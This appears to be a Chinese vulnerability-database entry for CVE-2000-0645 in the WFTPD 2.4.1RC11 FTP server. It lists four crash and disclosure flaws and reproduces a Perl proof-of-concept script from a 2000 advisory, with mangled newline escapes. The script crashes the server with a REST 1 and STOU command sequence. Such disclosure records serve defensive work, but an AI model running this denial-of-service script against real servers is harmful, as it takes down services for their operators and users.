WFTPD 2.4.1RC11多个漏洞

WFTPD 2.4.1RC11多个漏洞

漏洞ID 1105935 漏洞类型 输入验证
发布时间 2000-07-21 更新时间 2005-10-20
图片[1]-WFTPD 2.4.1RC11多个漏洞-安全小百科CVE编号 CVE-2000-0645
图片[2]-WFTPD 2.4.1RC11多个漏洞-安全小百科CNNVD-ID CNNVD-200007-060
漏洞平台 Windows CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/20101
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200007-060
|漏洞详情
WFTPD和WFTPDPro2.41版本存在漏洞。远程攻击者通过使用RESTART(REST)命令且书写超出了文件的末尾,或者写入不存在的文件,借助如STOREUNIQUE(STOU),STORE(STOR),或者APPEND(APPE)命令导致服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/1506/info
 
WFTPD versions prior to 2.4.1RC11 suffer from a number of vulnerabilities.
 
1) Issuing a STAT command while a LIST is in progress will cause the ftp server to crash.
2) If the REST command is used to write past the end of a file or to a non-existant file (with STOU, STOR, or APPE), the ftp server will crash.
3) If a transfer is in progress and a STAT command is issued, the full path and filename on the server is revealed.
4) If an MLST command is sent without first logging in with USER and PASS, the ftp server will crash.

================================================================
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC11
21/07/2000 (dd/mm/yyyy)

[email protected]
http://bluepanda.box.sk/
#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service #2
# Blue Panda - [email protected]
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#

use IO::Socket;

$host = "ftp.host.com" ;
$port = "21";
$user = "anonymous";
$pass = "p@nda";
$wait = 10;

# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.n";
print "done.n";

print $socket "USER $usernPASS $passnREST 1nSTOUn";

# Wait a while, just to make sure the commands have arrived.
print "Waiting...";
$time = 0;
while ($time < $wait) {
        sleep(1);
        print ".";
        $time += 1;
}

# Finished.
close($socket);
print "nConnection closed. Finished.n"
|参考资料

来源:BID
名称:1506
链接:http://www.securityfocus.com/bid/1506
来源:BUGTRAQ
名称:20000721WFTPD/WFTPDPro2.41RC11vulnerabilities.
链接:http://archives.neohapsis.com/archives/bugtraq/2000-07/0295.html

相关推荐: BeOS Felix IRC客户端服务拒绝漏洞

BeOS Felix IRC客户端服务拒绝漏洞 漏洞ID 1206085 漏洞类型 未知 发布时间 2001-01-09 更新时间 2001-01-09 CVE编号 CVE-2000-1150 CNNVD-ID CNNVD-200101-013 漏洞平台 N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享